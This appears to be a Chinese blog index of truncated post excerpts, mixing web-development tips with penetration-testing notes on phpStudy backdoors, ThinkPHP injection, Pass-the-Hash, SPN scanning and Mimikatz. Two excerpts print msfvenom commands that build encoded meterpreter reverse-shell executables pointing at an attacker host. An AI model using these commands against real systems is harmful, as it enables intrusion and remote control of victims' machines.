weixin_30886233的博客

前言：.Net Core程序（网站）可以部署在windows IIS ,也可以部署在Linux系统（更加推荐）本文部署，基于.net core 2.1,服务器CentOS 7, 需要安装的服务有2个：Nginx,SuperVisor(进程守护)命令预览：Linux: 重启：rebootNginx: 强杀: killall -9 nginx　　　　测试配置...

一、windows下安装mysql1.下载mysql包：https://dev.mysql.com/downloads/mysql/2.解压到特定的地方即可（当作是已安装的文件使用，我这样使用免安装的方法）如我的习惯：D:\software是用用来做软件安装的路径。把mysql-8.0.17-winx64解压到这里（免安装）：3.配置环境变量（我...

新功能引导实现的思路：1.类似于intro.js的实现，通过html元素id或者其它属性找到该dom节点，将其z-index调至较高层级；如果新功能需要可点击操作，则使用该种方法2.使用css的outline属性.guide { outline: 9999px solid rgba(0,0,0,.75);}　　以上方法在火狐浏览器会有兼容性问...

在web页面实现类似于浏览器的页签功能，使用vue的keep-alive组件做缓存基本实现如下：1.将需要做缓存的视图用keep-alive包裹<keep-alive :include="keepAliveComponents"> <router-view></router-view> ...

写两个一个批量检测的 一个交互式shell的暂时py 图形化的qt写出来..有点问题后门包 :GET / HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0Accept:...

复习C/C++又到指针这里，想起大一那时候第一次学C这个简单的问题弄了好久都没理解，也是笨关于指针在我第一次学的时候觉得绕来绕去以至于就没理解到就混了过去，网上很多文章讲指针都能讲错也是服了最近很想说的话: 很多以前学过的基础的东西还是有的模棱两可，学了一次不叫会了，写了博客也不叫会了，得熟记于心能运用才叫会。目录:　...

2019.9.20得知非官网的一些下载站中的phpstudy版本存在后门文件 说是官网下的就没有后门20号出现的新闻 今天phpstudy官网21号又更新一波 不太好说这是什么操作哦 此地无银三百两？很开心的说 我以前的虚拟机装的应该是有后门版本(任何文件我从来都是官网下文件) 用cha...

开始复现审计一下tp3和tp5的框架漏洞，当个练习吧。涉及注入的方法为where() table()delete()等。环境tp3.2.3 :0x01注入成因测试代码: public function index2(){// $data = M('user')-> where('username...

最近看java框架源码也是看的有点头疼，好多还要复习熟悉还有好多事没做...慢慢熬。网上好像还没有特别详细的分析我来误人子弟吧。0x01tp3中的exp表达式查询表达式的使用格式：$map['字段名'] = array('表达式','查询条件');表达式不分大小写，支持的查询表达式有下面几种，分别表示的含义是：...

补充一下端口复用的知识0x01关于端口复用端口复用也是很老的后门技术，主要是劫持web服务器相关进程/服务的内存空间、系统API甚至劫持网络驱动去达到目的，在winsocket的实现中，对于服务器的绑定是可以多重绑定的，在确定多重绑定使用谁的时候，根据一条原则是谁的指定最明确则将包递交给谁，而且没有权限之分。这种多重绑定便称之为端口复用。这里总结的是基于we...

水一水最近玩的工具弄dll注入的时候用到的介绍这款老工具免杀效果一般。。但是简单实用目录:　　　　0x01backdoor-factory简介　　　　0x02特点功能　　　　0x03具体参数使用　　　　PS：后门添加私钥证书https://tools.kali.org/exploitation-tools/bac...

0x01 Metasploit派生shell给Cobaltstrike生成木马:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.5.4 LPORT=4444 -f exe > test.exe[-] No platform wa...

今晚回学校无聊搞搞自己school 实战的时候遇到mimikatz抓密码报错 以前没遇过记一下(水一篇)爆ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061开始以为又是上次2008注册表组策略的问题结果runas就解决...

分享下自己一直收集和使用的笔记方便快速查找。链接:https://pan.baidu.com/s/1QopVQj3yMAWY1EU5xWEecQ提取码：X3b1转载于:https://www.cnblogs.com/-qing-/p/11403328.html...

贴上使用笔记不多介绍了 很简单的东西msfvenom各平台生成木马大全:windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b 'x00x0axff' -i 3 -f e...

总结下PtH具体形式(wmicexec、powershell、msf等)0x01PtH攻击原理 &&黄金白银票据PtH攻击原理wikihttps://en.wikipedia.org/wiki/Pass_the_hash写的也很清楚其中重要的是windows使用系统API(LsaLogonUser)生成...

0x01关于SPN服务主体名称（SPN）是Kerberos客户端用于唯一标识给特定Kerberos目标计算机的服务实例名称。服务主体名称是服务实例（可以理解为一个服务，比如 HTTP、MSSQL）的唯一标识符。Kerberos 身份验证使用 SPN 将服务实例与服务登录帐户相关联。在内部网络中，SPN扫描通过 查询向域控制器执行服务发现。这对于红队而言，可以帮助...

今天把自己用的win7渗透虚拟机和渗透工具脚本整合到一起备份传网盘了:D:\渗透工具包>dir 驱动器 D 中的卷是 DATA 卷的序列号是 0D74-084B D:\渗透工具包 的目录2019/09/08 17:30 <DIR> .2019/09/08 17:30 ...

1.由于pip中自带的安装源下载太慢,可以自己配置下载源1):文件管理器文件路径地址栏敲%APPDATA%2):在这个文件下创建一个新的pip文件并在这个文件下创建一个,pip.ini文件3):在这个文件中添加配置内容[global]index-url = http://pypi.douban.com/simple[install]use-mirrors ...

项目中我们配置文件是怎么执行的喃?1,在我们创建一个Django项目的时候,Django中的manage.py这个文件就会自动把我们的setting这个加载到全局配置中2.在全局的配置中,我们加载到,暴露给用户的setting配置,在LazySettings(LazyObject) 类中获取到暴露给用户的setting在LazySettin...